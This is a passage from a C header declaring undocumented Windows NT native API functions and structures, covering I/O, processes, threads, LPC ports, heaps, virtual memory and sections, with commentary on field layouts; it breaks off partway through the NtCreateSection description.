    IN ULONG IoControlCode,
    IN PVOID InputBuffer,
    IN ULONG InputBufferLength,
    IN PVOID OutputBuffer,
    IN ULONG OutputBufferLength
    );


NTSYSAPI
NTSTATUS
NTAPI
ZwDeviceIoControlFile(
    IN HANDLE FileHandle,
    IN HANDLE Event,
    IN PIO_APC_ROUTINE ApcRoutine,
    IN PVOID ApcContext,
    OUT PIO_STATUS_BLOCK IoStatusBlock,
    IN ULONG IoControlCode,
    IN PVOID InputBuffer,
    IN ULONG InputBufferLength,
    IN PVOID OutputBuffer,
    IN ULONG OutputBufferLength
    );


NTSYSAPI
NTSTATUS
NTAPI
NtCancelIoFile(
    IN HANDLE Filehandle,
    OUT PIO_STATUS_BLOCK IoStatusBlock
    );


NTSYSAPI
NTSTATUS
NTAPI
ZwCancelIoFile(
    IN HANDLE Filehandle,
    OUT PIO_STATUS_BLOCK IoStatusBlock
    );


// Converts a DOS path ("C:\...") into the NT object-manager form expected
// by the OBJECT_ATTRIBUTES of the Nt*File routines. The routine allocates
// NtPathName.Buffer for the caller; the header does not say how it is to
// be released, so check the ntdll documentation before relying on it.
NTSYSAPI
BOOLEAN
NTAPI
RtlDosPathNameToNtPathName_U (
    IN PWSTR DosPathName,
    OUT PUNICODE_STRING NtPathName,
    OUT PWSTR * NtFileNamePart OPTIONAL,
    OUT PCURDIR DirectoryInfo OPTIONAL
    );


//-----------------------------------------------------------------------------
// Process functions

#define GDI_HANDLE_BUFFER_SIZE 34

//
// Process Information Classes
//

typedef enum _PROCESSINFOCLASS {
    ProcessBasicInformation,
    ProcessQuotaLimits,
    ProcessIoCounters,
    ProcessVmCounters,
    ProcessTimes,
    ProcessBasePriority,
    ProcessRaisePriority,
    ProcessDebugPort,
    ProcessExceptionPort,
    ProcessAccessToken,
    ProcessLdtInformation,
    ProcessLdtSize,
    ProcessDefaultHardErrorMode,
    ProcessIoPortHandlers,          // Note: this is kernel mode only
    ProcessPooledUsageAndLimits,
    ProcessWorkingSetWatch,
    ProcessUserModeIOPL,
    ProcessEnableAlignmentFaultFixup,
    ProcessPriorityClass,
    ProcessWx86Information,
    ProcessHandleCount,
    ProcessAffinityMask,
    ProcessPriorityBoost,
    ProcessDeviceMap,
    ProcessSessionInformation,
    ProcessForegroundInformation,
    ProcessWow64Information,
    ProcessImageFileName,
    ProcessLUIDDeviceMapsEnabled,
    ProcessBreakOnTermination,
    ProcessDebugObjectHandle,
    ProcessDebugFlags,
    ProcessHandleTracing,
    MaxProcessInfoClass             // MaxProcessInfoClass should always be the last enum
} PROCESSINFOCLASS;

//
// Thread Information Classes
//

// The "??" markers are the original author's: the buffer layout for those
// classes was not known when this header was written.
typedef enum _THREADINFOCLASS {
    ThreadBasicInformation,                 // ??
    ThreadTimes,
    ThreadPriority,                         // ??
    ThreadBasePriority,                     // ??
    ThreadAffinityMask,                     // ??
    ThreadImpersonationToken,               // HANDLE
    ThreadDescriptorTableEntry,             // ULONG Selector + LDT_ENTRY
    ThreadEnableAlignmentFaultFixup,        // ??
    ThreadEventPair,                        // ??
    ThreadQuerySetWin32StartAddress,        // ??
    ThreadZeroTlsCell,                      // ??
    ThreadPerformanceCount,                 // ??
    ThreadAmILastThread,                    // ??
    ThreadIdealProcessor,                   // ??
    ThreadPriorityBoost,                    // ??
    ThreadSetTlsArrayAddress,               // ??
    MaxThreadInfoClass
} THREADINFOCLASS;


typedef struct _RTL_DRIVE_LETTER_CURDIR
{
    USHORT Flags;
    USHORT Length;
    ULONG TimeStamp;
    STRING DosPath;

} RTL_DRIVE_LETTER_CURDIR, *PRTL_DRIVE_LETTER_CURDIR;


// Process start-up parameters as referenced from PEB.ProcessParameters.
// NOTE(review): the field set and widths below follow the original header;
// later Windows versions append fields and 64-bit builds use different
// offsets, so do not derive offsets from this declaration without checking
// against the target OS.
typedef struct _RTL_USER_PROCESS_PARAMETERS
{
    ULONG MaximumLength;                            // Should be set before call RtlCreateProcessParameters
    ULONG Length;                                   // Length of valid structure
    ULONG Flags;                                    // Currently only PPF_NORMALIZED (1) is known:
                                                    //  - Means that structure is normalized by call RtlNormalizeProcessParameters
    ULONG DebugFlags;

    PVOID ConsoleHandle;                            // HWND to console window associated with process (if any).
    ULONG ConsoleFlags;
    HANDLE StandardInput;
    HANDLE StandardOutput;
    HANDLE StandardError;

    CURDIR CurrentDirectory;                        // Specified in DOS-like symbolic link path, ex: "C:/WinNT/SYSTEM32"
    UNICODE_STRING DllPath;                         // DOS-like paths separated by ';' where system should search for DLL files.
    UNICODE_STRING ImagePathName;                   // Full path in DOS-like format to the process's file image.
    UNICODE_STRING CommandLine;                     // Command line
    PVOID Environment;                              // Pointer to environment block (see RtlCreateEnvironment)
    ULONG StartingX;
    ULONG StartingY;
    ULONG CountX;
    ULONG CountY;
    ULONG CountCharsX;
    ULONG CountCharsY;
    ULONG FillAttribute;                            // Fill attribute for console window
    ULONG WindowFlags;
    ULONG ShowWindowFlags;
    UNICODE_STRING WindowTitle;
    UNICODE_STRING DesktopInfo;                     // Name of WindowStation and Desktop objects, where process is assigned
    UNICODE_STRING ShellInfo;
    UNICODE_STRING RuntimeData;
    RTL_DRIVE_LETTER_CURDIR CurrentDirectores[0x20]; // (sic) one per drive letter
    ULONG EnvironmentSize;
} RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS;

//
// Process Environment Block
//

typedef struct _PEB_FREE_BLOCK
{
    struct _PEB_FREE_BLOCK *Next;
    ULONG Size;

} PEB_FREE_BLOCK, *PPEB_FREE_BLOCK;


// Loader bookkeeping reached via PEB.Ldr. Each of the three lists threads
// LDR_DATA_TABLE_ENTRY records through the matching *Links field.
typedef struct _PEB_LDR_DATA
{
    ULONG Length;
    BOOLEAN Initialized;
    HANDLE SsHandle;
    LIST_ENTRY InLoadOrderModuleList;               // Points to the loaded modules (main EXE usually)
    LIST_ENTRY InMemoryOrderModuleList;             // Points to all modules (EXE and all DLLs)
    LIST_ENTRY InInitializationOrderModuleList;
    PVOID EntryInProgress;

} PEB_LDR_DATA, *PPEB_LDR_DATA;


// One loaded module. Unknown1..3 are placeholders the original author could
// not identify; treat everything after PatchInformation as unverified.
typedef struct _LDR_DATA_TABLE_ENTRY
{
    LIST_ENTRY InLoadOrderLinks;
    LIST_ENTRY InMemoryOrderLinks;
    LIST_ENTRY InInitializationOrderLinks;
    PVOID DllBase;                                  // Base address of the module
    PVOID EntryPoint;
    ULONG SizeOfImage;
    UNICODE_STRING FullDllName;
    UNICODE_STRING BaseDllName;
    ULONG Flags;
    USHORT LoadCount;
    USHORT TlsIndex;
    LIST_ENTRY HashLinks;
    PVOID SectionPointer;
    ULONG CheckSum;
    ULONG TimeDateStamp;
    PVOID LoadedImports;
    PVOID EntryPointActivationContext;
    PVOID PatchInformation;
    PVOID Unknown1;
    PVOID Unknown2;
    PVOID Unknown3;

} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;


// Process Environment Block.
// NOTE(review): the ULONG sizing fields (HeapSegmentReserve and friends)
// and GdiHandleBuffer[34] correspond to the 32-bit layout; the 64-bit PEB
// uses pointer-sized fields there and a larger GDI buffer. The comment
// further down about fields changing since NT 4.0 applies to the whole
// structure: confirm offsets against the target OS before using them.
typedef struct _PEB
{
    BOOLEAN InheritedAddressSpace;                  // These four fields cannot change unless the
    BOOLEAN ReadImageFileExecOptions;               //
    BOOLEAN BeingDebugged;                          //
    BOOLEAN SpareBool;                              //
    HANDLE Mutant;                                  // INITIAL_PEB structure is also updated.

    PVOID ImageBaseAddress;
    PPEB_LDR_DATA Ldr;
    PRTL_USER_PROCESS_PARAMETERS ProcessParameters;
    PVOID SubSystemData;
    PVOID ProcessHeap;
    PVOID FastPebLock;
    PVOID FastPebLockRoutine;
    PVOID FastPebUnlockRoutine;
    ULONG EnvironmentUpdateCount;
    PVOID KernelCallbackTable;
    HANDLE SystemReserved;
    PVOID AtlThunkSListPtr32;
    PPEB_FREE_BLOCK FreeList;
    ULONG TlsExpansionCounter;
    PVOID TlsBitmap;
    ULONG TlsBitmapBits[2];                         // relates to TLS_MINIMUM_AVAILABLE
    PVOID ReadOnlySharedMemoryBase;
    PVOID ReadOnlySharedMemoryHeap;
    PVOID *ReadOnlyStaticServerData;
    PVOID AnsiCodePageData;
    PVOID OemCodePageData;
    PVOID UnicodeCaseTableData;

    //
    // Useful information for LdrpInitialize

    ULONG NumberOfProcessors;
    ULONG NtGlobalFlag;

    //
    // Passed up from MmCreatePeb from Session Manager registry key
    //

    LARGE_INTEGER CriticalSectionTimeout;
    ULONG HeapSegmentReserve;
    ULONG HeapSegmentCommit;
    ULONG HeapDeCommitTotalFreeThreshold;
    ULONG HeapDeCommitFreeBlockThreshold;

    //
    // Where heap manager keeps track of all heaps created for a process
    // Fields initialized by MmCreatePeb.  ProcessHeaps is initialized
    // to point to the first free byte after the PEB and MaximumNumberOfHeaps
    // is computed from the page size used to hold the PEB, less the fixed
    // size of this data structure.
    //

    ULONG NumberOfHeaps;
    ULONG MaximumNumberOfHeaps;
    PVOID *ProcessHeaps;

    //
    //
    PVOID GdiSharedHandleTable;
    PVOID ProcessStarterHelper;
    PVOID GdiDCAttributeList;
    PVOID LoaderLock;

    //
    // Following fields filled in by MmCreatePeb from system values and/or
    // image header.  These fields have changed since Windows NT 4.0,
    // so use with caution
    //

    ULONG OSMajorVersion;
    ULONG OSMinorVersion;
    USHORT OSBuildNumber;
    USHORT OSCSDVersion;
    ULONG OSPlatformId;
    ULONG ImageSubsystem;
    ULONG ImageSubsystemMajorVersion;
    ULONG ImageSubsystemMinorVersion;
    ULONG ImageProcessAffinityMask;
    ULONG GdiHandleBuffer[GDI_HANDLE_BUFFER_SIZE];

} PEB, *PPEB;


//
// Thread environment block
//

// Only the leading fields are declared ("Incomplete" below); sizeof(TEB)
// from this header is therefore not the real TEB size.
typedef struct _TEB
{
    NT_TIB NtTib;
    PVOID EnvironmentPointer;
    CLIENT_ID ClientId;
    PVOID ActiveRpcHandle;
    PVOID ThreadLocalStoragePointer;
    PPEB ProcessEnvironmentBlock;
    ULONG LastErrorValue;
    ULONG CountOfOwnedCriticalSections;
    PVOID CsrClientThread;
    PVOID Win32ThreadInfo;
    // Incomplete

} TEB, *PTEB;


// Buffer layout for NtQueryInformationProcess(ProcessBasicInformation).
typedef struct _PROCESS_BASIC_INFORMATION
{
    NTSTATUS ExitStatus;
    PPEB PebBaseAddress;
    ULONG_PTR AffinityMask;
    KPRIORITY BasePriority;
    ULONG_PTR UniqueProcessId;
    ULONG_PTR InheritedFromUniqueProcessId;

} PROCESS_BASIC_INFORMATION,*PPROCESS_BASIC_INFORMATION;



// Pseudo-handles for the calling process and thread; they are not real
// handle-table entries and must not be closed.
#define NtCurrentProcess() ((HANDLE) -1)
#define NtCurrentThread() ((HANDLE) -2)

NTSYSAPI
NTSTATUS
NTAPI
NtOpenProcess (
    OUT PHANDLE ProcessHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes,
    IN PCLIENT_ID ClientId OPTIONAL
    );

// Declared NTSYSCALLAPI rather than NTSYSAPI, as in the original header.
NTSYSCALLAPI
NTSTATUS
NTAPI
NtSuspendProcess(
    IN HANDLE ProcessHandle
    );

NTSYSCALLAPI
NTSTATUS
NTAPI
NtResumeProcess(
    IN HANDLE ProcessHandle
    );

NTSYSAPI
NTSTATUS
NTAPI
NtOpenThread (
    OUT PHANDLE ThreadHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes,
    IN PCLIENT_ID ClientId OPTIONAL
    );

// ThreadInformationLength is the byte size of the caller's buffer; on
// success ReturnLength (if supplied) receives the size actually needed.
NTSYSAPI
NTSTATUS
NTAPI
NtQueryInformationThread(
    IN HANDLE ThreadHandle,
    IN THREADINFOCLASS ThreadInformationClass,
    OUT PVOID ThreadInformation,
    IN ULONG ThreadInformationLength,
    OUT PULONG ReturnLength OPTIONAL
    );

// Same buffer contract as NtQueryInformationThread; e.g. pass a
// PROCESS_BASIC_INFORMATION for ProcessBasicInformation.
NTSYSAPI
NTSTATUS
NTAPI
NtQueryInformationProcess(
    IN HANDLE ProcessHandle,
    IN PROCESSINFOCLASS ProcessInformationClass,
    OUT PVOID ProcessInformation,
    IN ULONG ProcessInformationLength,
    OUT PULONG ReturnLength OPTIONAL
    );


NTSYSAPI
NTSTATUS
NTAPI
NtSetInformationProcess (
    IN HANDLE ProcessHandle,
    IN PROCESSINFOCLASS ProcessInformationClass,
    IN PVOID ProcessInformation,
    IN ULONG ProcessInformationLength
    );

//------------------------------------------------------------------------------
// LPC Functions

#define MAX_LPC_DATA 0x130                          // Maximum number of bytes that can be copied through LPC

// LPC connection types
typedef enum _LPC_TYPE
{
    LPC_NEW_MESSAGE,                                // (0) A new message
    LPC_REQUEST,                                    // (1) A request message
    LPC_REPLY,                                      // (2) A reply to a request message
    LPC_DATAGRAM,                                   // (3)
    LPC_LOST_REPLY,                                 // (4)
    LPC_PORT_CLOSED,                                // (5) Sent when port is deleted
    LPC_CLIENT_DIED,                                // (6) Messages to thread termination ports
    LPC_EXCEPTION,                                  // (7) Messages to thread exception ports
    LPC_DEBUG_EVENT,                                // (8) Messages to thread debug port
    LPC_ERROR_EVENT,                                // (9) Used by NtRaiseHardError
    LPC_CONNECTION_REQUEST                          // (A) Used by NtConnectPort

} LPC_TYPE, *PLPC_TYPE;

//
// Define header for Port Message
//

// Every LPC message starts with this header; the payload follows it and is
// DataLength bytes long (TotalLength = DataLength + sizeof(PORT_MESSAGE)).
// The last two fields share storage (anonymous union).
typedef struct _PORT_MESSAGE
{
    USHORT DataLength;                              // Length of data following the header (bytes)
    USHORT TotalLength;                             // Length of data + sizeof(PORT_MESSAGE)
    USHORT Type;                                    // Type of the message (See LPC_TYPE enum)
    USHORT VirtualRangesOffset;                     // Offset of array of virtual address ranges
    CLIENT_ID ClientId;                             // Client identifier of the message sender
    ULONG MessageId;                                // Identifier of the particular message instance
    union
    {
        ULONG CallbackId;                           //
        ULONG ClientViewSize;                       // Size, in bytes, of section created by the sender
    };

} PORT_MESSAGE, *PPORT_MESSAGE;

//
// Define structure for initializing shared memory on the caller's side of the port
//

typedef struct _PORT_VIEW {

    ULONG Length;                                   // Size of this structure
    HANDLE SectionHandle;                           // Handle to section object with
                                                    // SECTION_MAP_WRITE and SECTION_MAP_READ
    ULONG SectionOffset;                            // The offset in the section to map a view for
                                                    // the port data area. The offset must be aligned
                                                    // with the allocation granularity of the system.
    ULONG ViewSize;                                 // The size of the view (in bytes)
    PVOID ViewBase;                                 // The base address of the view in the creator
                                                    //
    PVOID ViewRemoteBase;                           // The base address of the view in the process
                                                    // connected to the port.
} PORT_VIEW, *PPORT_VIEW;

//
// Define structure for shared memory coming from remote side of the port
//

typedef struct _REMOTE_PORT_VIEW {

    ULONG Length;                                   // Size of this structure
    ULONG ViewSize;                                 // The size of the view (bytes)
    PVOID ViewBase;                                 // Base address of the view

} REMOTE_PORT_VIEW, *PREMOTE_PORT_VIEW;

/*++

 NtCreatePort
 ============

 Creates a LPC port object. The creator of the LPC port becomes a server
 of LPC communication

 PortHandle - Points to a variable that will receive the
    port object handle if the call is successful.

 ObjectAttributes - Points to a structure that specifies the object's
    attributes. OBJ_KERNEL_HANDLE, OBJ_OPENLINK, OBJ_OPENIF, OBJ_EXCLUSIVE,
    OBJ_PERMANENT, and OBJ_INHERIT are not valid attributes for a port object.

 MaxConnectionInfoLength - The maximum size, in bytes, of data that can
    be sent through the port.

 MaxMessageLength - The maximum size, in bytes, of a message
    that can be sent through the port.

 MaxPoolUsage - Specifies the maximum amount of NonPaged pool that can be used for
    message storage. Zero means default value.

 ZwCreatePort verifies that (MaxDataSize <= 0x104) and (MaxMessageSize <= 0x148).

--*/

NTSYSAPI
NTSTATUS
NTAPI
NtCreatePort(
    OUT PHANDLE PortHandle,
    IN POBJECT_ATTRIBUTES ObjectAttributes,
    IN ULONG MaxConnectionInfoLength,
    IN ULONG MaxMessageLength,
    IN ULONG MaxPoolUsage
    );


/*++

 NtConnectPort
 =============

 Creates a port connected to a named port (client side).

 PortHandle - A pointer to a variable that will receive the client
    communication port object handle value.

 PortName - Points to a structure that specifies the name
    of the port to connect to.

 SecurityQos - Points to a structure that specifies the level
    of impersonation available to the port listener.

 ClientView - Optionally points to a structure describing
    the shared memory region used to send large amounts of data
    to the listener; if the call is successful, this will be updated.

 ServerView - Optionally points to a caller-allocated buffer
    or variable that receives information on the shared memory region
    used by the listener to send large amounts of data to the
    caller.

 MaxMessageLength - Optionally points to a variable that receives the size,
    in bytes, of the largest message that can be sent through the port.

 ConnectionInformation - Optionally points to a caller-allocated
    buffer or variable that specifies connect data to send to the listener,
    and receives connect data sent by the listener.

 ConnectionInformationLength - Optionally points to a variable that
    specifies the size, in bytes, of the connect data to send
    to the listener, and receives the size of the connect data
    sent by the listener.

--*/

NTSYSAPI
NTSTATUS
NTAPI
NtConnectPort(
    OUT PHANDLE PortHandle,
    IN PUNICODE_STRING PortName,
    IN PSECURITY_QUALITY_OF_SERVICE SecurityQos,
    IN OUT PPORT_VIEW ClientView OPTIONAL,
    OUT PREMOTE_PORT_VIEW ServerView OPTIONAL,
    OUT PULONG MaxMessageLength OPTIONAL,
    IN OUT PVOID ConnectionInformation OPTIONAL,
    IN OUT PULONG ConnectionInformationLength OPTIONAL
    );


NTSYSAPI
NTSTATUS
NTAPI
ZwConnectPort(
    OUT PHANDLE PortHandle,
    IN PUNICODE_STRING PortName,
    IN PSECURITY_QUALITY_OF_SERVICE SecurityQos,
    IN OUT PPORT_VIEW ClientView OPTIONAL,
    OUT PREMOTE_PORT_VIEW ServerView OPTIONAL,
    OUT PULONG MaxMessageLength OPTIONAL,
    IN OUT PVOID ConnectionInformation OPTIONAL,
    IN OUT PULONG ConnectionInformationLength OPTIONAL
    );


/*++

 NtListenPort
 ============

 Listens on a port for a connection request message on the server side.

 PortHandle - A handle to a port object. The handle doesn't need
    to grant any specific access.

 ConnectionRequest - Points to a caller-allocated buffer
    or variable that receives the connect message sent to
    the port. (Declared as RequestMessage in the prototype below.)

--*/


NTSYSAPI
NTSTATUS
NTAPI
NtListenPort(
    IN HANDLE PortHandle,
    OUT PPORT_MESSAGE RequestMessage
    );

/*++

 NtAcceptConnectPort
 ===================

 Accepts or rejects a connection request on the server side.

 PortHandle - Points to a variable that will receive the port object
    handle if the call is successful.

 PortContext - A numeric identifier to be associated with the port.

 ConnectionRequest - Points to a caller-allocated buffer or variable
    that identifies the connection request and contains any connect
    data that should be returned to requestor of the connection

 AcceptConnection - Specifies whether the connection should
    be accepted or not

 ServerView - Optionally points to a structure describing
    the shared memory region used to send large amounts of data to the
    requestor; if the call is successful, this will be updated

 ClientView - Optionally points to a caller-allocated buffer
    or variable that receives information on the shared memory
    region used by the requestor to send large amounts of data to the
    caller

--*/


NTSYSAPI
NTSTATUS
NTAPI
NtAcceptConnectPort(
    OUT PHANDLE PortHandle,
    IN PVOID PortContext OPTIONAL,
    IN PPORT_MESSAGE ConnectionRequest,
    IN BOOLEAN AcceptConnection,
    IN OUT PPORT_VIEW ServerView OPTIONAL,
    OUT PREMOTE_PORT_VIEW ClientView OPTIONAL
    );

/*++

 NtCompleteConnectPort
 =====================

 Completes the port connection process on the server side.

 PortHandle - A handle to a port object. The handle doesn't need
    to grant any specific access.

--*/


NTSYSAPI
NTSTATUS
NTAPI
NtCompleteConnectPort(
    IN HANDLE PortHandle
    );


NTSYSAPI
NTSTATUS
NTAPI
ZwCompleteConnectPort(
    IN HANDLE PortHandle
    );


/*++

 NtRequestPort
 =============

 Sends a request message to a port (client side)

 PortHandle - A handle to a port object. The handle doesn't need
    to grant any specific access.

 RequestMessage - Points to a caller-allocated buffer or variable
    that specifies the request message to send to the port.

--*/

NTSYSAPI
NTSTATUS
NTAPI
NtRequestPort (
    IN HANDLE PortHandle,
    IN PPORT_MESSAGE RequestMessage
    );

/*++

 NtRequestWaitReplyPort
 ======================

 Sends a request message to a port and waits for a reply (client side)

 PortHandle - A handle to a port object. The handle doesn't need
    to grant any specific access.

 RequestMessage - Points to a caller-allocated buffer or variable
    that specifies the request message to send to the port.

 ReplyMessage - Points to a caller-allocated buffer or variable
    that receives the reply message sent to the port.

--*/

NTSYSAPI
NTSTATUS
NTAPI
NtRequestWaitReplyPort(
    IN HANDLE PortHandle,
    IN PPORT_MESSAGE RequestMessage,
    OUT PPORT_MESSAGE ReplyMessage
    );


NTSYSAPI
NTSTATUS
NTAPI
ZwRequestWaitReplyPort(
    IN HANDLE PortHandle,
    IN PPORT_MESSAGE RequestMessage,
    OUT PPORT_MESSAGE ReplyMessage
    );


/*++

 NtReplyPort
 ===========

 Sends a reply message to a port (Server side)

 PortHandle - A handle to a port object. The handle doesn't need
    to grant any specific access.

 ReplyMessage - Points to a caller-allocated buffer or variable
    that specifies the reply message to send to the port.

--*/


NTSYSAPI
NTSTATUS
NTAPI
NtReplyPort(
    IN HANDLE PortHandle,
    IN PPORT_MESSAGE ReplyMessage
    );

/*++

 NtReplyWaitReplyPort
 ====================

 Sends a reply message to a port and waits for a reply message

 PortHandle - A handle to a port object. The handle doesn't need
    to grant any specific access.

 ReplyMessage - Points to a caller-allocated buffer or variable
    that specifies the reply message to send to the port.
    (IN OUT: the buffer is reused for the reply that is received.)

--*/

NTSYSAPI
NTSTATUS
NTAPI
NtReplyWaitReplyPort(
    IN HANDLE PortHandle,
    IN OUT PPORT_MESSAGE ReplyMessage
    );


/*++

 NtReplyWaitReceivePort
 ======================

 Optionally sends a reply message to a port and waits for a
 message

 PortHandle - A handle to a port object. The handle doesn't need
    to grant any specific access.

 PortContext - Optionally points to a variable that receives
    a numeric identifier associated with the port.

 ReplyMessage - Optionally points to a caller-allocated buffer
    or variable that specifies the reply message to send to the port.

 ReceiveMessage - Points to a caller-allocated buffer or variable
    that receives the message sent to the port.

--*/

NTSYSAPI
NTSTATUS
NTAPI
NtReplyWaitReceivePort(
    IN HANDLE PortHandle,
    OUT PVOID *PortContext OPTIONAL,
    IN PPORT_MESSAGE ReplyMessage OPTIONAL,
    OUT PPORT_MESSAGE ReceiveMessage
    );

//-----------------------------------------------------------------------------
// Heap functions

// Flags for RtlCreateHeap / RtlAllocateHeap / RtlReAllocateHeap.
#define HEAP_NO_SERIALIZE               0x00000001
#define HEAP_GROWABLE                   0x00000002
#define HEAP_GENERATE_EXCEPTIONS        0x00000004
#define HEAP_ZERO_MEMORY                0x00000008
#define HEAP_REALLOC_IN_PLACE_ONLY      0x00000010
#define HEAP_TAIL_CHECKING_ENABLED      0x00000020
#define HEAP_FREE_CHECKING_ENABLED      0x00000040
#define HEAP_DISABLE_COALESCE_ON_FREE   0x00000080
#define HEAP_CREATE_ALIGN_16            0x00010000
#define HEAP_CREATE_ENABLE_TRACING      0x00020000
#define HEAP_MAXIMUM_TAG                0x0FFF
#define HEAP_PSEUDO_TAG_FLAG            0x8000

//
// Data structure for heap definition.  This includes various
// sizing parameters and callback routines, which, if left NULL,
// result in default behavior
//

// Note the tag is declared without the usual leading underscore
// (RTL_HEAP_PARAMETERS, not _RTL_HEAP_PARAMETERS); kept as in the original.
typedef struct RTL_HEAP_PARAMETERS {
    ULONG Length;                                   //sizeof(RTL_HEAP_PARAMETERS)
    ULONG SegmentReserve;
    ULONG SegmentCommit;
    ULONG DeCommitFreeBlockThreshold;
    ULONG DeCommitTotalFreeThreshold;
    ULONG MaximumAllocationSize;
    ULONG VirtualMemoryThreshold;
    ULONG InitialCommit;
    ULONG InitialReserve;
    PVOID CommitRoutine;
    ULONG Reserved;
} RTL_HEAP_PARAMETERS, *PRTL_HEAP_PARAMETERS;


// Default process heap, read from the TEB -> PEB chain declared above.
// Relies on NtCurrentTeb(), which this header does not declare (presumably
// the SDK's winnt.h provides it).
#define RtlProcessHeap() (HANDLE)(NtCurrentTeb()->ProcessEnvironmentBlock->ProcessHeap)


NTSYSAPI
HANDLE
NTAPI
RtlCreateHeap (
    IN ULONG Flags,
    IN PVOID BaseAddress OPTIONAL,
    IN ULONG SizeToReserve,
    IN ULONG SizeToCommit,
    IN BOOLEAN Lock OPTIONAL,
    IN PRTL_HEAP_PARAMETERS Definition OPTIONAL
    );


NTSYSAPI
ULONG
NTAPI
RtlDestroyHeap (
    IN HANDLE HeapHandle
    );


// Returns NULL on failure unless HEAP_GENERATE_EXCEPTIONS is set in Flags.
NTSYSAPI
PVOID
NTAPI
RtlAllocateHeap (
    IN HANDLE HeapHandle,
    IN ULONG Flags,
    IN ULONG Size
    );


NTSYSAPI
BOOLEAN
NTAPI
RtlFreeHeap (
    IN HANDLE HeapHandle,
    IN ULONG Flags,
    IN PVOID Address
    );


NTSYSAPI
ULONG
NTAPI
RtlCompactHeap (
    IN HANDLE HeapHandle,
    IN ULONG Flags
    );


NTSYSAPI
BOOLEAN
NTAPI
RtlLockHeap (
    IN HANDLE HeapHandle
    );


NTSYSAPI
BOOLEAN
NTAPI
RtlUnlockHeap (
    IN HANDLE HeapHandle
    );


NTSYSAPI
PVOID
NTAPI
RtlReAllocateHeap (
    IN HANDLE HeapHandle,
    IN ULONG Flags,
    IN PVOID
Address, 3421 | IN ULONG Size 3422 | ); 3423 | 3424 | 3425 | NTSYSAPI 3426 | ULONG 3427 | NTAPI 3428 | RtlSizeHeap ( 3429 | IN HANDLE HeapHandle, 3430 | IN ULONG Flags, 3431 | IN PVOID Address 3432 | ); 3433 | 3434 | 3435 | NTSYSAPI 3436 | BOOLEAN 3437 | NTAPI 3438 | RtlValidateHeap ( 3439 | IN HANDLE HeapHandle, 3440 | IN ULONG Flags, 3441 | IN PVOID Address OPTIONAL 3442 | ); 3443 | 3444 | 3445 | //----------------------------------------------------------------------------- 3446 | // Virtual memory functions 3447 | 3448 | NTSYSAPI 3449 | NTSTATUS 3450 | NTAPI 3451 | NtAllocateVirtualMemory ( 3452 | IN HANDLE ProcessHandle, 3453 | IN OUT PVOID *BaseAddress, 3454 | IN ULONG ZeroBits, 3455 | IN OUT PULONG RegionSize, 3456 | IN ULONG AllocationType, 3457 | IN ULONG Protect 3458 | ); 3459 | 3460 | 3461 | NTSYSAPI 3462 | NTSTATUS 3463 | NTAPI 3464 | ZwAllocateVirtualMemory ( 3465 | IN HANDLE ProcessHandle, 3466 | IN OUT PVOID *BaseAddress, 3467 | IN ULONG ZeroBits, 3468 | IN OUT PULONG RegionSize, 3469 | IN ULONG AllocationType, 3470 | IN ULONG Protect 3471 | ); 3472 | 3473 | 3474 | NTSYSAPI 3475 | NTSTATUS 3476 | NTAPI 3477 | NtFreeVirtualMemory ( 3478 | IN HANDLE ProcessHandle, 3479 | IN OUT PVOID *BaseAddress, 3480 | IN OUT PULONG RegionSize, 3481 | IN ULONG FreeType 3482 | ); 3483 | 3484 | 3485 | NTSYSAPI 3486 | NTSTATUS 3487 | NTAPI 3488 | ZwFreeVirtualMemory ( 3489 | IN HANDLE ProcessHandle, 3490 | IN OUT PVOID *BaseAddress, 3491 | IN OUT PULONG RegionSize, 3492 | IN ULONG FreeType 3493 | ); 3494 | 3495 | 3496 | NTSYSAPI 3497 | NTSTATUS 3498 | NTAPI 3499 | NtReadVirtualMemory( 3500 | IN HANDLE ProcessHandle, 3501 | IN PVOID BaseAddress, 3502 | OUT PVOID Buffer, 3503 | IN ULONG NumberOfBytesToRead, 3504 | OUT PULONG NumberOfBytesRead OPTIONAL 3505 | ); 3506 | 3507 | 3508 | NTSYSAPI 3509 | NTSTATUS 3510 | NTAPI 3511 | NtWriteVirtualMemory( 3512 | IN HANDLE ProcessHandle, 3513 | IN PVOID BaseAddress, 3514 | IN PVOID Buffer, 3515 | IN ULONG NumberOfBytesToWrite, 
3516 | OUT PULONG NumberOfBytesWritten OPTIONAL 3517 | ); 3518 | 3519 | 3520 | //----------------------------------------------------------------------------- 3521 | // Section functions 3522 | 3523 | typedef enum _SECTION_INHERIT 3524 | { 3525 | ViewShare = 1, 3526 | ViewUnmap = 2 3527 | 3528 | } SECTION_INHERIT; 3529 | 3530 | 3531 | typedef enum _SECTION_INFORMATION_CLASS 3532 | { 3533 | SectionBasicInformation, 3534 | SectionImageInformation 3535 | 3536 | } SECTION_INFORMATION_CLASS, *PSECTION_INFORMATION_CLASS; 3537 | 3538 | 3539 | /*++ 3540 | 3541 | NtCreateSection 3542 | =============== 3543 | 3544 | Creates a section object. 3545 | 3546 | SectionHandle - Points to a variable that will receive the section 3547 | object handle if the call is successful. 3548 | 3549 | DesiredAccess - Specifies the type of access that the caller requires 3550 | to the section object. This parameter can be zero, or any combination 3551 | of the following flags: 3552 | 3553 | SECTION_QUERY - Query access 3554 | SECTION_MAP_WRITE - Can be written when mapped 3555 | SECTION_MAP_READ - Can be read when mapped 3556 | SECTION_MAP_EXECUTE - Can be executed when mapped 3557 | SECTION_EXTEND_SIZE - Extend access 3558 | SECTION_ALL_ACCESS - All of the preceding + 3559 | STANDARD_RIGHTS_REQUIRED 3560 | 3561 | ObjectAttributes - Points to a structure that specifies the object s attributes. 3562 | OBJ_OPENLINK is not a valid attribute for a section object. 3563 | 3564 | MaximumSize - Optionally points to a variable that specifies the size, 3565 | in bytes, of the section. If FileHandle is zero, the size must be 3566 | specified; otherwise, it can be defaulted from the size of the file 3567 | referred to by FileHandle. 3568 | 3569 | SectionPageProtection - The protection desired for the pages 3570 | of the section when the section is mapped. 
